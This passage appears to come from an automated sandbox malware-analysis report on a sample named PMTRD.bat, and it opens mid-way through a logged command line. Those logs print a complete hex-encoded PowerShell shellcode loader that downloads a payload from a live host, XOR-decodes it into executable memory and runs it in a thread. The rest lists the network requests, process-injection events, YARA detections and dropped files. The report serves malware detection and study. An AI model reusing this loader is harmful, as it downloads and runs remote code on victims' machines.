2757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B0D0A202024787878786D7077343D24787878632E446F776E6C6F616444617461282478787864293B0D0A2020247878786C656E203D2024787878786D7077342E4C656E6774683B0D0A2020247878787830203D2024787878676163663A3A476C6F62616C416C6C6F63283078303034302C20247878786C656E2B3078313030293B0D0A2020247878786F6C64203D20303B0D0A2020247878786161623A3A5669727475616C50726F74656374282478787878302C20247878786C656E2B30783130302C20307834302C205B7265665D247878786F6C64293B0D0A2020247878786B6579203D2024787878786D7077345B305D3B0D0A2020247878786461746150203D2024787878786D7077345B315D3B0D0A2020666F7220282478787868203D20303B202478787868202D6C7420247878786C656E2D2478787864617461503B2024787878682B2B29207B2020200D0A2020205B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478787878302C2024787878682C202824787878786D7077345B24787878682B2478787864617461505D202D62786F722024787878786D7077345B305D2920293B0D0A20207D3B0D0A2020747279207B0D0A2020207468726F7720313B0D0A20207D6361746368207B0D0A2020202478787868616E646C653D247878786363633A3A43726561746554687265616428302C302C2478787878302C302C302C30293B0D0A202020247878786666663A3A57616974466F7253696E676C654F626A656374282478787868616E646C652C202D31293B0D0A20207D3B0D0A202024787878653D3232323B0D0A207D63617463687B0D0A2020736C6565702031353B0D0A202024787878653D3131323B0D0A207D0D0A7D207768696C65282478787865202D657120313132293B""";$Nrd="""""";for($O6c6=0;$O6c6 -le $FX.Length-2;$O6c6=$O6c6+2){$Eh=$FX[$O6c6]+$FX[$O6c6+1];$Nrd= $Nrd+[char]([convert]::toint16($Eh,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($Nrd));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($tsA));" filepath_r: C:\Windows\SysWOW64\cmd.exe stack_pivoted: 0 creation_flags: 525328 (CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1	0
CreateProcessInternalW May 25, 2023, 10:49 a.m.	thread_identifier: 2812 thread_handle: 0x00000084 process_identifier: 2808 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: powershell -windowstyle hidden -command "$tsA ="$FX="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C202033303732293B0D0A247878786161633D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E74507472205669727475616C416C6C6F6328496E7450747220622C75696E7420632C75696E7420642C75696E742065293B273B0D0A24787878766163663D4164642D54797065202D4D656D626572446566696E6974696F6E2024787878616163202D4E616D65202241414322202D50617373546872753B0D0A2478787861626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B0D0A247878786161623D4164642D54797065202D4D656D626572446566696E6974696F6E202478787861626162202D4E616D65202241414222202D50617373546872753B0D0A247878786761633D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B0D0A24787878676163663D4164642D54797065202D4D656D626572446566696E6974696F6E2024787878676163202D4E616D6520224741432220202D50617373546872753B0D0A247878786D6F763D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20766F69642052746C4D6F76654D656D6F727928496E7450747220622C496E7450747220632C75696E742064293B273B0D0A247878786D6F766D3D4164642D54797065202D4D656D626572446566696E6974696F6E20247878786D6F76202D4E616D6520224D4F5622202D50617373546872753B0D0A247878786D6D733D275B446C6C496D706F727428226D73766372742E646C6C22295D7075626C6963207374617469632065787465726E20496E74507472206D656D73657428496E74507472206473742C75696E74207372632C75696E7420636F756E74293B273B0D0A247878786D6D73663D4164642D54797065202D4D656D626572446566696E6974696F6E20247878786D6D73202D4E616D6520224D4D5322202D50617373546872753B0D0A2478787863203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B0D0A24787878643D22687474703A2F2F766D693831303833302E636F6E7461626F7365727665722E6E65742F6C6F63616C2F63616368652D6A732F66393337353465363630383032643763633730393234636365623437333865662E677A220D0A2478787862623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B0D0A247878786363633D4164642D54797065202D4D656D626572446566696E6974696F6E20247878786262202D4E616D65202242424222202D50617373546872753B0D0A247878786464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B0D0A247878786666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024787878646464202D4E616D65202244444422202D50617373546872753B0D0A24787878653D3131323B0D0A646F207B0D0A20747279207B200D0A202024787878632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B0D0A202024787878786D7077343D24787878632E446F776E6C6F616444617461282478787864293B0D0A2020247878786C656E203D2024787878786D7077342E4C656E6774683B0D0A2020247878787830203D2024787878676163663A3A476C6F62616C416C6C6F63283078303034302C20247878786C656E2B3078313030293B0D0A2020247878786F6C64203D20303B0D0A2020247878786161623A3A5669727475616C50726F74656374282478787878302C20247878786C656E2B30783130302C20307834302C205B7265665D247878786F6C64293B0D0A2020247878786B6579203D2024787878786D7077345B305D3B0D0A2020247878786461746150203D2024787878786D7077345B315D3B0D0A2020666F7220282478787868203D20303B202478787868202D6C7420247878786C656E2D2478787864617461503B2024787878682B2B29207B2020200D0A2020205B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478787878302C2024787878682C202824787878786D7077345B24787878682B2478787864617461505D202D62786F722024787878786D7077345B305D2920293B0D0A20207D3B0D0A2020747279207B0D0A2020207468726F7720313B0D0A20207D6361746368207B0D0A2020202478787868616E646C653D247878786363633A3A43726561746554687265616428302C302C2478787878302C302C302C30293B0D0A202020247878786666663A3A57616974466F7253696E676C654F626A656374282478787868616E646C652C202D31293B0D0A20207D3B0D0A202024787878653D3232323B0D0A207D63617463687B0D0A2020736C6565702031353B0D0A202024787878653D3131323B0D0A207D0D0A7D207768696C65282478787865202D657120313132293B""";$Nrd="""""";for($O6c6=0;$O6c6 -le $FX.Length-2;$O6c6=$O6c6+2){$Eh=$FX[$O6c6]+$FX[$O6c6+1];$Nrd= $Nrd+[char]([convert]::toint16($Eh,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($Nrd));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($tsA));" filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses May 25, 2023, 10:49 a.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (8 events)

Data received	HTTP/1.1 404 Not Found Date: Thu, 25 May 2023 01:49:44 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 289 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL was not found on this server.</p> <hr> <address>Apache/2.4.41 (Ubuntu) Server at vmi810830.contaboserver.net Port 80</address> </body></html>
Data received	HTTP/1.1 404 Not Found Date: Thu, 25 May 2023 01:49:59 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 289 Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL was not found on this server.</p> <hr> <address>Apache/2.4.41 (Ubuntu) Server at vmi810830.contaboserver.net Port 80</address> </body></html>
Data received	HTTP/1.1 404 Not Found Date: Thu, 25 May 2023 01:50:15 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 289 Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL was not found on this server.</p> <hr> <address>Apache/2.4.41 (Ubuntu) Server at vmi810830.contaboserver.net Port 80</address> </body></html>
Data received	HTTP/1.1 404 Not Found Date: Thu, 25 May 2023 01:50:30 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 289 Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL was not found on this server.</p> <hr> <address>Apache/2.4.41 (Ubuntu) Server at vmi810830.contaboserver.net Port 80</address> </body></html>
Data received	HTTP/1.1 404 Not Found Date: Thu, 25 May 2023 01:50:46 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 289 Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL was not found on this server.</p> <hr> <address>Apache/2.4.41 (Ubuntu) Server at vmi810830.contaboserver.net Port 80</address> </body></html>
Data received	HTTP/1.1 404 Not Found Date: Thu, 25 May 2023 01:51:01 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 289 Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL was not found on this server.</p> <hr> <address>Apache/2.4.41 (Ubuntu) Server at vmi810830.contaboserver.net Port 80</address> </body></html>
Data received	HTTP/1.1 404 Not Found Date: Thu, 25 May 2023 01:51:17 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 289 Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL was not found on this server.</p> <hr> <address>Apache/2.4.41 (Ubuntu) Server at vmi810830.contaboserver.net Port 80</address> </body></html>
Data received	HTTP/1.1 404 Not Found Date: Thu, 25 May 2023 01:51:33 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 289 Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL was not found on this server.</p> <hr> <address>Apache/2.4.41 (Ubuntu) Server at vmi810830.contaboserver.net Port 80</address> </body></html>

Poweshell is sending data to a remote host (2 events)

Data sent	GET /local/cache-js/f93754e660802d7cc70924cceb4738ef.gz HTTP/1.1 User-Agent: connnecting... Host: vmi810830.contaboserver.net Connection: Keep-Alive
Data sent	GET /local/cache-js/f93754e660802d7cc70924cceb4738ef.gz HTTP/1.1 User-Agent: connnecting... Host: vmi810830.contaboserver.net

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW May 25, 2023, 10:49 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (50 out of 62 events)

description	Create a windows service	rule	Create_Service
description	Communication using DGA	rule	Network_DGA
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Communications over HTTP	rule	Network_HTTP
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Steal credential	rule	local_credential_Steal
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Communications over P2P network	rule	Network_P2P_Win
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Escalate priviledges	rule	Escalate_priviledges
description	File Downloader	rule	Network_Downloader
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	Take ScreenShot	rule	ScreenShot
description	Create a windows service	rule	Create_Service
description	Communication using DGA	rule	Network_DGA
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Communications over HTTP	rule	Network_HTTP
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Steal credential	rule	local_credential_Steal
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Communications over P2P network	rule	Network_P2P_Win
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Escalate priviledges	rule	Escalate_priviledges
description	File Downloader	rule	Network_Downloader
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active

Uses Windows utilities for basic Windows functionality (7 events)

cmdline	"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\l9fffhn5.cmdline"
cmdline	"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\hhisrn0v.cmdline"
cmdline	"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\ztglqo2w.cmdline"
cmdline	"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\rktisogl.cmdline"
cmdline	"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\8dsuuhnt.cmdline"
cmdline	"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\zucfn5_i.cmdline"
cmdline	"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\x_sns7up.cmdline"

Deletes executed files from disk (2 events)

file	C:\Users\test22\AppData\Local\Temp\RESF647.tmp
file	c:\Users\test22\AppData\Local\Temp\CSCF637.tmp

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (8 events)

Time & API	Arguments	Status	Return
send May 25, 2023, 10:49 a.m.	buffer: GET /local/cache-js/f93754e660802d7cc70924cceb4738ef.gz HTTP/1.1 User-Agent: connnecting... Host: vmi810830.contaboserver.net Connection: Keep-Alive socket: 1344 sent: 155	1	155
send May 25, 2023, 10:49 a.m.	buffer: GET /local/cache-js/f93754e660802d7cc70924cceb4738ef.gz HTTP/1.1 User-Agent: connnecting... Host: vmi810830.contaboserver.net socket: 1344 sent: 131	1	131
send May 25, 2023, 10:50 a.m.	buffer: GET /local/cache-js/f93754e660802d7cc70924cceb4738ef.gz HTTP/1.1 User-Agent: connnecting... Host: vmi810830.contaboserver.net socket: 1344 sent: 131	1	131
send May 25, 2023, 10:50 a.m.	buffer: GET /local/cache-js/f93754e660802d7cc70924cceb4738ef.gz HTTP/1.1 User-Agent: connnecting... Host: vmi810830.contaboserver.net socket: 1344 sent: 131	1	131
send May 25, 2023, 10:50 a.m.	buffer: GET /local/cache-js/f93754e660802d7cc70924cceb4738ef.gz HTTP/1.1 User-Agent: connnecting... Host: vmi810830.contaboserver.net socket: 1344 sent: 131	1	131
send May 25, 2023, 10:50 a.m.	buffer: GET /local/cache-js/f93754e660802d7cc70924cceb4738ef.gz HTTP/1.1 User-Agent: connnecting... Host: vmi810830.contaboserver.net socket: 1344 sent: 131	1	131
send May 25, 2023, 10:51 a.m.	buffer: GET /local/cache-js/f93754e660802d7cc70924cceb4738ef.gz HTTP/1.1 User-Agent: connnecting... Host: vmi810830.contaboserver.net socket: 1344 sent: 131	1	131
send May 25, 2023, 10:51 a.m.	buffer: GET /local/cache-js/f93754e660802d7cc70924cceb4738ef.gz HTTP/1.1 User-Agent: connnecting... Host: vmi810830.contaboserver.net socket: 1344 sent: 131	1	131

One or more non-whitelisted processes were created (7 events)

parent_process	powershell.exe	martian_process	"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\l9fffhn5.cmdline"
parent_process	powershell.exe	martian_process	"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\hhisrn0v.cmdline"
parent_process	powershell.exe	martian_process	"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\x_sns7up.cmdline"
parent_process	powershell.exe	martian_process	"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\rktisogl.cmdline"
parent_process	powershell.exe	martian_process	"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\8dsuuhnt.cmdline"
parent_process	powershell.exe	martian_process	"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\zucfn5_i.cmdline"
parent_process	powershell.exe	martian_process	"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\ztglqo2w.cmdline"

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2636 resumed a thread in remote process 2724
NtResumeThread May 25, 2023, 10:49 a.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 2724	1	0	0

Creates a suspicious Powershell process (2 events)

option	-windowstyle hidden				value	Attempts to execute command with a hidden window
option	-windowstyle hidden				value	Attempts to execute command with a hidden window

The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

PMTRD.bat

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All